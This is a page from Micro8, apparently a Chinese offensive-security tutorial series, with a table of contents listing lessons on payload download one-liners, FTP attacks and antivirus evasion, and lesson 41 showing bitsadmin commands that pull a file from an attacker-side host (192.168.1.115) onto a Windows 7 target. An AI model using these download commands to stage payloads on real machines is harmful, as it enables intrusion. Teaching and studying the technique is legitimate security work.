Micro8
Micro8
专注APT攻击与防御
前言
Preface
目录
第一章:生
1-10课
11-20课
21-30课
31-40课
41-50课
第四十一课:bitsadmin一句话下载payload
第四十二课:攻击FTP服务
第四十三课:js一句话下载payload
第四十四课:ertutil一句话下载payload补充
第四十五课:解决bat一句话下载payload黑窗
第四十六课:powershell一句话下载payload
第四十七课:payload分离免杀思路
第四十八课:payload分离免杀思路第二季
第四十九课:关于Powershell对抗安全软件
第五十课:基于SqlDataSourceEnumerator发现内网存活主机
51-60课
61-70课
71-80课
81-90课
91-100课
第二章:老(待更新...)
第三章:病(待更新...)
Powered by GitBook

第四十一课:bitsadmin一句话下载payload

微软官方做出如下解释:

BITSAdmin是一个命令行工具,可用于创建下载或上传并监视其进度。

具体相关参数参见官方文档: https://docs.microsoft.com/zh-cn/windows/desktop/Bits/bitsadmin-tool

自 windows7 以上版本内置 bitsadmin,它可以在网络不稳定的状态下下载文件,出错会自动重试,在比较复杂的网络环境下,有着不错的性能。

靶机:windows 7

E:\>bitsadmin /rawreturn /transfer down "http://192.168.1.115/robots.txt" E:\PDF\robots.txt

需要注意的是,bitsadmin要求服务器支持Range标头。

如果需要下载过大的文件,需要提高优先级。配合上面的下载命令。再次执行

bitsadmin /setpriority down foreground

如果下载文件在1-5M之间,需要时时查看进度。同样它也支持进度条。

bitsadmin /transfer down /download /priority normal "http://192.168.1.115/robots.txt" E:\PDF\robots.txt

后者的话:不支持https协议。

Micropoor

Previous
41-50课
Next
第四十二课:攻击FTP服务
Last updated 10 months ago
Edit on GitHub